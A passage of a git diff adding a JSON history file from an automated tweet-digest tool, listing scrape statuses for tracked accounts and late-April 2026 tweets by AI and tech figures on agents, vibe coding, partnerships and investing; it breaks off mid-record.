四、代表性推文\n\n- @JeffDean | 2026-04-27T13:40:08+00:00\n - The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conve…\n - https://nitter.net/JeffDean/status/2048759102390899142#m\n- @GaryMarcus | 2026-04-27T13:32:43+00:00\n - ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT a…\n - https://nitter.net/GaryMarcus/status/2048757233174122827#m\n- @HarryStebbings | 2026-04-27T13:30:16+00:00\n - Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. A…\n - https://nitter.net/HarryStebbings/status/2048756619622707452#m\n- @soumithchintala | 2026-04-27T13:29:14+00:00\n - This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternat…\n - https://nitter.net/soumithchintala/status/2048756358820827564#m\n- @sama | 2026-04-27T13:24:26+00:00\n - we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.…\n - https://nitter.net/sama/status/2048755148361707946#m\n- @Ronald_vanLoon | 2026-04-27T13:11:07+00:00\n - Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m\n- @sama | 2026-04-27T13:09:30+00:00\n - this is so good: https://paulgraham.com/kids.html\n - https://nitter.net/sama/status/2048751392031203544#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intellige…\n - https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m\n- @Ronald_vanLoon | 2026-04-27T13:00:20+00:00\n - R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is…\n - https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m\n- @Ronald_vanLoon | 2026-04-27T13:00:19+00:00\n - R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestrat…\n - https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m\n- @Ronald_vanLoon | 2026-04-27T13:00:18+00:00\n - Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one …\n - https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m\n- @Ronald_vanLoon | 2026-04-27T12:50:08+00:00\n - Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m\n- @GaryMarcus | 2026-04-27T12:48:41+00:00\n - R to @GaryMarcus: Stop blaming the users. It’s not that simple:\n - https://nitter.net/GaryMarcus/status/2048746152749846549#m\n- @GaryMarcus | 2026-04-27T12:36:05+00:00\n - People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right. Users *are*screwing up - by letting vibe coded stuff access their files, wi…\n - https://nitter.net/GaryMarcus/status/2048742983684784239#m\n- @GaryMarcus | 2026-04-27T12:20:17+00:00\n - “Vibe coded disasters piling up on Reddit”\n - https://nitter.net/GaryMarcus/status/2048739005525877072#m\n- @Ronald_vanLoon | 2026-04-27T12:18:17+00:00\n - AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n - https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m\n- @Ronald_vanLoon | 2026-04-27T11:20:17+00:00\n - Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence by @CyberRobooo #Robot #Engineering #Innovation #Technology\n - https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m\n- @Ronald_vanLoon | 2026-04-27T10:56:01+00:00\n - You’re about to feel the #AI money squeeze by Hayden Field @verge Learn more: https://bit.ly/3QwH0fu #ArtificialIntelligence #MachineLearning #ML\n - https://nitter.net/Ronald_vanLoon/status/2048717799531397534#m\n- @Ronald_vanLoon | 2026-04-27T10:50:49+00:00\n - Shape-Shifting All-Terrain #Robot Combines Legs, Wheels, and Aerial #Drone Power by @XueJia24682 #Robotics #EmergingTech #Technology #Innovation\n - https://nitter.net/Ronald_vanLoon/status/2048716491537650168#m\n- @Ronald_vanLoon | 2026-04-27T10:18:11+00:00\n - Pizza Goes Underwater: Domino’s UK Trials Submarine Delivery by @IntEngineering #Innovation #EmergingTech #Tech #Technology #TechForGood\n - https://nitter.net/Ronald_vanLoon/status/2048708277739876755#m\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_134616.json b/data/x_brief/history/20260427_134616.json new file mode 100644 index 0000000..28e3581 --- /dev/null +++ b/data/x_brief/history/20260427_134616.json @@ -0,0 +1,1782 @@ +{ + "generated_at": "2026-04-27T13:44:13.237379+00:00", + "period": { + "days": 7, + "start_utc": "2026-04-20T13:43:39.630597+00:00", + "end_utc": "2026-04-27T13:44:13.237379+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 33, + "active_accounts": 17, + "total_tweets": 145, + "failed_accounts": 4 + }, + "accounts": [ + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "andrejkarpathy", + "account": "@andrejkarpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "lmsqueegie", + "account": "@lmsqueegie", + "name": "Lars Nielsen", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "david__tian", + "account": "@david__tian", + "name": "David Tian", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Bitking_", + "account": "@Bitking_", + "name": "BTCKing", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "Altcoin Buzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "TradingGods", + "account": "@TradingGods", + "name": "Trading Gods", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "Warrior_Trading", + "account": "@Warrior_Trading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "ProfTrading", + "account": "@ProfTrading", + "name": "Profitable Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "直播带逛Tommy", + "account": "@直播带逛Tommy", + "name": "Tommy", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "" + }, + { + "handle": "MikeAI", + "account": "@MikeAI", + "name": "Michael", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "URLError: " + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "王川", + "account": "@王川", + "name": "王川", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "老胡", + "account": "@老胡", + "name": "老胡", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "比特币超级玩家", + "account": "@比特币超级玩家", + "name": "超级玩家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + } + ], + "tweets": [ + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", + "url": "https://nitter.net/JeffDean/status/2048759102390899142#m", + "published_at": "2026-04-27T13:40:08+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system prompts and guardrails would save him. They didn’t. \n\nIn this case he lost data. Eventually people will lose lives.", + "url": "https://nitter.net/GaryMarcus/status/2048757233174122827#m", + "published_at": "2026-04-27T13:32:43+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go to Canary Wharf, set up AI training centre. Partner with Goldman, JP Morgan etc etc. Sign enterprise agreement with them to train all new employees. \n\nBoth absolute goldmines!", + "url": "https://nitter.net/HarryStebbings/status/2048756619622707452#m", + "published_at": "2026-04-27T13:30:16+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to the cloud era enterprise pains. I'm sure these issues would apply to all the other AI providers.\n\nhttps://www.reddit.com/r/ClaudeAI/comments/1sspwz2/psa_anthropic_bans_organizations_without_warning/", + "url": "https://nitter.net/soumithchintala/status/2048756358820827564#m", + "published_at": "2026-04-27T13:29:14+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 2030.", + "url": "https://nitter.net/sama/status/2048755148361707946#m", + "published_at": "2026-04-27T13:24:26+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials\nvia @IlirAliu_\n \n#Robotics #ArtificialIntelligence #ML #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m", + "published_at": "2026-04-27T13:11:07+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://nitter.net/sama/status/2048751392031203544#m", + "published_at": "2026-04-27T13:09:30+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My view is simple:\n\nThe winners in enterprise AI will not be the companies with access to the most models.\n\nThey will be the ones that build the best intelligent systems around them.\n\nIf you want the full breakdown, watch the video and tell me what part of your AI stack you are rethinking first.\n\nWhat do you think becomes the real source of advantage in the next 12 months, the model itself, or the orchestration layer around it?\n\nCheck out the full article: https://www.linkedin.com/pulse/agentic-ai-reshaping-enterprise-strategy-faster-than-you-van-loon-9rfme", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m", + "published_at": "2026-04-27T13:00:20+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The second misconception I keep seeing:\n\nToo many teams think they have to choose between open models and proprietary models.\n\nThey do not.\n\nThe smarter path is hybrid.\n\n→ proprietary models for scale and broad capability\n→ open models for flexibility and control\n→ orchestration layers to route each task to the best-fit model in real time\n\nThat is how you balance performance, cost, and governance without locking yourself into one lane.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m", + "published_at": "2026-04-27T13:00:20+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My biggest takeaway:\n\nModels are becoming components, not products.\n\nWhat matters now is the system around them:\n\n→ runtimes\n→ memory\n→ tool access\n→ orchestration\n→ secure execution environments\n\nThat is what turns a model into an agent, and an agent into something the business can actually deploy across functions.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m", + "published_at": "2026-04-27T13:00:19+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Most enterprise AI strategies are already behind.\n\nNot because they picked the wrong model, but because they are still thinking at the model layer.\n\nThe real shift is happening one level up, where AI becomes a system that can reason, use tools, retain context, and execute work inside secure environments.\n\nThat changes enterprise strategy faster than most leaders realize.\n\nA thread, with insights from my latest video with NVIDIA…\n\n#NVIDIAPartner #NVIDIAGTC", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m", + "published_at": "2026-04-27T13:00:18+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain\nby @spaceandtech_\n\n#Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m", + "published_at": "2026-04-27T12:50:08+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m", + "published_at": "2026-04-27T12:48:41+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "published_at": "2026-04-27T12:36:05+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m", + "published_at": "2026-04-27T12:20:17+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being\nvia @XRoboHub\n\n#Robots #ArtificialIntelligence #Innovation #Technology #Tech", + "url": "https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m", + "published_at": "2026-04-27T12:18:17+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence\nby @CyberRobooo\n \n#Robot #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m", + "published_at": "2026-04-27T11:20:17+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://nitter.net/paulg/status/2048704073356935676#m", + "published_at": "2026-04-27T10:01:28+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://nitter.net/paulg/status/2048701354672050286#m", + "published_at": "2026-04-27T09:50:40+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227#m", + "published_at": "2026-04-27T08:17:48+00:00" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://nitter.net/jasonfreedman/status/2048615296613937201#m", + "published_at": "2026-04-27T04:08:42+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "published_at": "2026-04-27T03:39:49+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://nitter.net/elonmusk/status/2048600964102246438#m", + "published_at": "2026-04-27T03:11:45+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m", + "published_at": "2026-04-27T02:41:14+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://nitter.net/elonmusk/status/2048589691054694406#m", + "published_at": "2026-04-27T02:26:57+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://nitter.net/SteveStricklan6/status/2048589239915577837#m", + "published_at": "2026-04-27T02:25:10+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m", + "published_at": "2026-04-27T01:59:04+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://nitter.net/Jason/status/2048580651985604783#m", + "published_at": "2026-04-27T01:51:02+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m", + "published_at": "2026-04-27T01:48:56+00:00" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://nitter.net/FrankRundatz/status/2048579079121555764#m", + "published_at": "2026-04-27T01:44:47+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://nitter.net/sama/status/2048554097985593849#m", + "published_at": "2026-04-27T00:05:31+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://nitter.net/sama/status/2048552677433643427#m", + "published_at": "2026-04-26T23:59:53+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://nitter.net/elonmusk/status/2048543344746250466#m", + "published_at": "2026-04-26T23:22:48+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://nitter.net/elonmusk/status/2048535299102265720#m", + "published_at": "2026-04-26T22:50:49+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "published_at": "2026-04-26T22:34:46+00:00" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m", + "published_at": "2026-04-26T21:21:33+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "published_at": "2026-04-26T20:42:24+00:00" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://nitter.net/Jason/status/2048487905543237675#m", + "published_at": "2026-04-26T19:42:30+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537#m", + "published_at": "2026-04-26T19:35:39+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": 